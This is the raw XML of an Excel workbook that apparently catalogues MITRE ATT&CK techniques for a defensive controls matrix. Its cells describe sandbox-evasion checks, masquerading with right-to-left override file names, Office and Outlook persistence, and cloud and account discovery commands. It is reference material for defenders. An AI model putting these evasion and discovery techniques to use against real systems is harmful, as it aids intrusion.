</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">MITRE ATT&amp;CK Terms of Use:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">LICENSE
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">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2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation."
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
DISCLAIMERS
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>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
See our FAQ for more information on how to use and represent the ATT&amp;CK name.</t>
    </r>
  </si>
  <si>
    <t>A drive-by compromise is when an adversary gains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tokens.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</si>
  <si>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</si>
  <si>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LOLBAS Msbuild)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LOLBAS Tracker)</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</si>
  <si>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location:&lt;code&gt;C:\Users\\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;code&gt;C:\Users\\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;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 Outlook Rules, Forms, and Home Page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To abuse these features, an adversary requires prior access to the user's Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the user's mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)(Citation: SensePost Outlook Forms)(Citation: SensePost Outlook Home Page)</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</si>
  <si>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BootExecute value of the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; is set to autocheck autochk *.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</si>
  <si>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</si>
  <si>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Adversaries may use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</si>
  <si>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[Scheduled Task](https://attack.mitre.org/techniques/T1053), [Disabling Security Tools](https://attack.mitre.org/techniques/T1089), [Remote File Copy](https://attack.mitre.org/techniques/T1105),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Publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053)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</si>
  <si>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Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information from learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Adversaries may use several methods including [Security Software Discovery](https://attack.mitre.org/techniques/T1063) to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. (Citation: Unit 42 Pirpi July 2015)
###Virtual Machine Environment Artifacts Discovery###
Adversaries may use utilities such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1086), [Systeminfo](https://attack.mitre.org/software/S0096), and the [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and/or the Registry. Adversaries may use [Scripting](https://attack.mitre.org/techniques/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. 
Example VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017)
* &lt;code&gt;HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions&lt;/code&gt;
* &lt;code&gt;HKLM\HARDWARE\Description\System\"SystemBiosVersion";"VMWARE"&lt;/code&gt;
* &lt;code&gt;HKLM\HARDWARE\ACPI\DSDT\BOX_&lt;/code&gt;
Example VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017)
* &lt;code&gt;WINDOWS\system32\drivers\vmmouse.sys&lt;/code&gt; 
* &lt;code&gt;WINDOWS\system32\vboxhook.dll&lt;/code&gt;
* &lt;code&gt;Windows\system32\vboxdisp.dll&lt;/code&gt;
Common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017)
###User Activity Discovery###
Adversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it's a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017).
###Virtual Hardware Fingerprinting Discovery###
Adversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query &lt;code&gt;$q = "Select * from Win32_Fan" Get-WmiObject -Query $q&lt;/code&gt;. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. (Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes.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(e.g. 'Password01'),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</si>
  <si>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Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738.(Citation: Microsoft User Modified Event)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Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.
Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
A larger volume of emails sent from an account than normal and the discovery of similar phishing emails being sent from€¯real accounts within a network may be signs that an account may have been compromised and attempts to leverage access with modified email permissions is occurring.</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</si>
  <si>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or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
A third variant uses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file named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;. A common use of this technique is with spearphishing attachments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Adversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017)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binaries include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis)  (Citation: Fysbis Dr Web Analysis)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</si>
  <si>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</si>
  <si>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</si>
  <si>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
### Office 365 and Azure AD
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)
Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)</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</si>
  <si>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Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. 
### Windows
Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; file can be viewed to gain insight into the existing hostname to IP mappings on the system.
### Mac
Specific to Mac, the &lt;code&gt;bonjour&lt;/code&gt; protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the &lt;code&gt;/etc/hosts&lt;/code&gt; file can be viewed to gain insight into existing hostname to IP mappings on the system.
### Linux
Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the &lt;code&gt;/etc/hosts&lt;/code&gt; file can be viewed to gain insight into existing hostname to IP mappings on the system.
### Cloud
In cloud environments, the above techniques may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs with information about remote systems and services.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</si>
  <si>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
### AWS
In Amazon Web Services (AWS), the Application Discovery Service may be used by an adversary to identify servers, virtual machines, software, and software dependencies running.(Citation: Amazon System Discovery)
### GCP
On Google Cloud Platform (GCP) &lt;code&gt;GET /v1beta1/{parent=organizations/*}/assets&lt;/code&gt; or &lt;code&gt;POST /v1beta1/{parent=organizations/*}/assets:runDiscovery&lt;/code&gt; may be used to list an organizations cloud assets, or perform asset discovery on a cloud environment.(Citation: Google Command Center Dashboard)
### Azure
In Azure, the API request &lt;code&gt;GET https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2019-03-01&lt;/code&gt; may be used to retrieve information about the model or instance view of a virtual machine.(Citation: Microsoft Virutal Machine API)</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</si>
  <si>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Many different methods to accomplish such network saturation have been observed, but most fall into two main categories: Direct Network Floods and Reflection Amplification.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attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).
###Direct Network Flood###
Direct Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for Direct Network Floods. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
###Reflection Amplification###
Adversaries may amplify the volume of their attack traffic by using Reflection.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</si>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</sst>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0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10.5"/>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7.5"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="6"/>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DCDCD"/>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5">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0"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3" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="3" borderId="1"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center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="2" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="3"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3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="2" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="3" borderId="7" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="12"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14" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="7" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="1" fillId="2" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="3" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="3" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="5" xfId="0" quotePrefix="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="3"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49" fontId="0" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="15" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="16" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="4">
    <dxf>
      <font>
        <color theme="0" tint="-0.499984740745262"/>
      </font>
      <border>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
      </font>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFF8F8F8"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="4" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FFCDCDCD"/>
      <color rgb="FFF8F8F8"/>
      <color rgb="FFDCE6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ttack.mitre.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybercontrolsmatr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L783"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="12.140625" style="36" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="8" style="11" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="10.7109375" style="42" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="25.5703125" style="2" customWidth="1"/>
    <col min="5" max="5" width="86.140625" style="3" customWidth="1"/>
    <col min="6" max="6" width="64.28515625" style="3" customWidth="1"/>
    <col min="7" max="7" width="54.42578125" style="3" customWidth="1"/>
    <col min="8" max="8" width="18.28515625" style="33" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="14.5703125" style="33" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="33" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="14.28515625" style="33" customWidth="1"/>
    <col min="12" max="12" width="40" style="23" customWidth="1"/>
    <col min="13" max="16384" width="9.140625" style="20"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" s="16" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A1" s="12" t="s">
        <v>3</v>
      </c>
      <c r="B1" s="13" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="37" t="s">
        <v>21</v>
      </c>
      <c r="D1" s="14" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="15" t="s">
        <v>5</v>
      </c>
      <c r="F1" s="15" t="s">
        <v>8</v>
      </c>
      <c r="G1" s="15" t="s">
        <v>3733</v>
      </c>
      <c r="H1" s="30" t="s">
        <v>16</v>
      </c>
      <c r="I1" s="30" t="s">
        <v>17</v>
      </c>
      <c r="J1" s="30" t="s">
        <v>19</v>
      </c>
      <c r="K1" s="30" t="s">
        <v>3834</v>
      </c>
      <c r="L1" s="21" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:12" s="17" customFormat="1" ht="25.5" x14ac:dyDescent="0.25">
      <c r="A2" s="34" t="s">
        <v>6</v>
      </c>
      <c r="B2" s="8"/>
      <c r="C2" s="38"/>
      <c r="D2" s="8"/>
      <c r="E2" s="8" t="str">
        <f>"Tactics: "&amp;COUNTIF(C:C,"Tactic")&amp;"    Techniques: "&amp;COUNTIF(C:C,"Technique")&amp;"    Mitigations: "&amp;COUNTIF(C:C,"Mitigation")&amp;"    Groups: "&amp;COUNTIF(C:C,"Group")&amp;"    Software: "&amp;COUNTIF(C:C,"Software")</f>
        <v>Tactics: 12    Techniques: 266    Mitigations: 41    Groups: 96    Software: 365</v>
      </c>
      <c r="F2" s="8" t="str">
        <f>"Techniques:    Windows = "&amp;COUNTIFS(C:C,"Technique",J:J,"*Windows*")&amp;", Linux = "&amp;COUNTIFS(C:C,"Technique",J:J,"*Linux*")&amp;", macOS = "&amp;COUNTIFS(C:C,"Technique",J:J,"*macOS*")&amp;","&amp;CHAR(10)&amp;"                                         AWS = "&amp;COUNTIFS(C:C,"Technique",J:J,"*AWS*")&amp;", GCP = "&amp;COUNTIFS(C:C,"Technique",J:J,"*GCP*")&amp;", Azure = "&amp;COUNTIFS(C:C,"Technique",J:J,"*Azure*")&amp;", Office365 = "&amp;COUNTIFS(C:C,"Technique",J:J,"*Office*")&amp;", SaaS = "&amp;COUNTIFS(C:C,"Technique",J:J,"*SaaS*")</f>
        <v>Techniques:    Windows = 136, Linux = 128, macOS = 135,
                                         AWS = 7, GCP = 7, Azure = 2, Office365 = 6, SaaS = 3</v>
      </c>
      <c r="G2" s="8" t="str">
        <f>"Software:    Windows = "&amp;COUNTIFS(C:C,"Software",J:J,"*Windows*")&amp;", Linux = "&amp;COUNTIFS(C:C,"Software",J:J,"*Linux*")&amp;", macOS = "&amp;COUNTIFS(C:C,"Software",J:J,"*macOS*")&amp;", Office365 = "&amp;COUNTIFS(C:C,"Software",J:J,"*Office*")</f>
        <v>Software:    Windows = 332, Linux = 33, macOS = 20, Office365 = 1</v>
      </c>
      <c r="H2" s="31"/>
      <c r="I2" s="31"/>
      <c r="J2" s="31"/>
      <c r="K2" s="31"/>
      <c r="L2" s="22" t="str">
        <f>"Technique Permissions:    Administrator = "&amp;COUNTIFS(C:C,"Technique",K:K,"*Administrator*")&amp;","&amp;CHAR(10)&amp;"Root = "&amp;COUNTIFS(C:C,"Technique",K:K,"*root*")&amp;", "&amp;"System = "&amp;COUNTIFS(C:C,"Technique",K:K,"*SYSTEM*")&amp;",  User = "&amp;COUNTIFS(C:C,"Technique",K:K,"*User*")&amp;",  RDP = "&amp;COUNTIFS(C:C,"Technique",K:K,"*Remote*")</f>
        <v>Technique Permissions:    Administrator = 112,
Root = 9, System = 33,  User = 150,  RDP = 1</v>
      </c>
    </row>
    <row r="3" spans="1:12" s="18" customFormat="1" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A3" s="35" t="s">
        <v>4</v>
      </c>
      <c r="B3" s="9"/>
      <c r="C3" s="39"/>
      <c r="D3" s="7" t="s">
        <v>7</v>
      </c>
      <c r="E3" s="6" t="s">
        <v>3835</v>
      </c>
      <c r="F3" s="5"/>
      <c r="G3" s="4"/>
      <c r="H3" s="32"/>
      <c r="I3" s="32"/>
      <c r="J3" s="32"/>
      <c r="K3" s="32"/>
      <c r="L3" s="29" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="105" x14ac:dyDescent="0.25">
      <c r="A4" s="19" t="s">
        <v>22</v>
      </c>
      <c r="B4" s="10">
        <v>0</v>
      </c>
      <c r="C4" s="40" t="s">
        <v>23</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>25</v>
      </c>
      <c r="L4" s="41" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A5" s="19" t="s">
        <v>27</v>
      </c>
      <c r="B5" s="10">
        <v>1</v>
      </c>
      <c r="C5" s="40" t="s">
        <v>28</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>29</v>
      </c>
      <c r="E5" s="27" t="s">
        <v>3836</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>30</v>
      </c>
      <c r="G5" s="25" t="s">
        <v>31</v>
      </c>
      <c r="H5" s="33" t="s">
        <v>3725</v>
      </c>
      <c r="I5" s="33" t="s">
        <v>32</v>
      </c>
      <c r="J5" s="33" t="s">
        <v>33</v>
      </c>
      <c r="K5" s="33" t="s">
        <v>3734</v>
      </c>
      <c r="L5" s="41" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="315" x14ac:dyDescent="0.25">
      <c r="A6" s="19" t="s">
        <v>35</v>
      </c>
      <c r="B6" s="10">
        <v>1</v>
      </c>
      <c r="C6" s="40" t="s">
        <v>28</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>37</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>38</v>
      </c>
      <c r="G6" s="3" t="s">
        <v>39</v>
      </c>
      <c r="H6" s="33" t="s">
        <v>3725</v>
      </c>
      <c r="I6" s="33" t="s">
        <v>40</v>
      </c>
      <c r="J6" s="33" t="s">
        <v>41</v>
      </c>
      <c r="L6" s="41" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="7" spans="1:12" ht="210" x14ac:dyDescent="0.25">
      <c r="A7" s="19" t="s">
        <v>43</v>
      </c>
      <c r="B7" s="10">
        <v>1</v>
      </c>
      <c r="C7" s="40" t="s">
        <v>28</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>45</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>46</v>
      </c>
      <c r="G7" s="3" t="s">
        <v>47</v>
      </c>
      <c r="H7" s="33" t="s">
        <v>48</v>
      </c>
      <c r="I7" s="33" t="s">
        <v>3797</v>
      </c>
      <c r="J7" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="K7" s="33" t="s">
        <v>3734</v>
      </c>
      <c r="L7" s="41" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="8" spans="1:12" ht="120" x14ac:dyDescent="0.25">
      <c r="A8" s="19" t="s">
        <v>50</v>
      </c>
      <c r="B8" s="10">
        <v>1</v>
      </c>
      <c r="C8" s="40" t="s">
        <v>28</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>51</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>52</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>53</v>
      </c>
      <c r="G8" s="3" t="s">
        <v>54</v>
      </c>
      <c r="H8" s="33" t="s">
        <v>3725</v>
      </c>
      <c r="I8" s="33" t="s">
        <v>3798</v>
      </c>
      <c r="J8" s="33" t="s">
        <v>33</v>
      </c>
      <c r="L8" s="41" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="210" x14ac:dyDescent="0.25">
      <c r="A9" s="19" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="10">
        <v>1</v>
      </c>
      <c r="C9" s="40" t="s">
        <v>28</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>57</v>
      </c>
      <c r="E9" s="3" t="s">
        <v>58</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>59</v>
      </c>
      <c r="G9" s="3" t="s">
        <v>60</v>
      </c>
      <c r="H9" s="33" t="s">
        <v>61</v>
      </c>
      <c r="I9" s="33" t="s">
        <v>3799</v>
      </c>
      <c r="J9" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="K9" s="33" t="s">
        <v>3734</v>
      </c>
      <c r="L9" s="41" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="10" spans="1:12" ht="330" x14ac:dyDescent="0.25">
      <c r="A10" s="19" t="s">
        <v>63</v>
      </c>
      <c r="B10" s="10">
        <v>1</v>
      </c>
      <c r="C10" s="40" t="s">
        <v>28</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E10" s="3" t="s">
        <v>65</v>
      </c>
      <c r="F10" s="3" t="s">
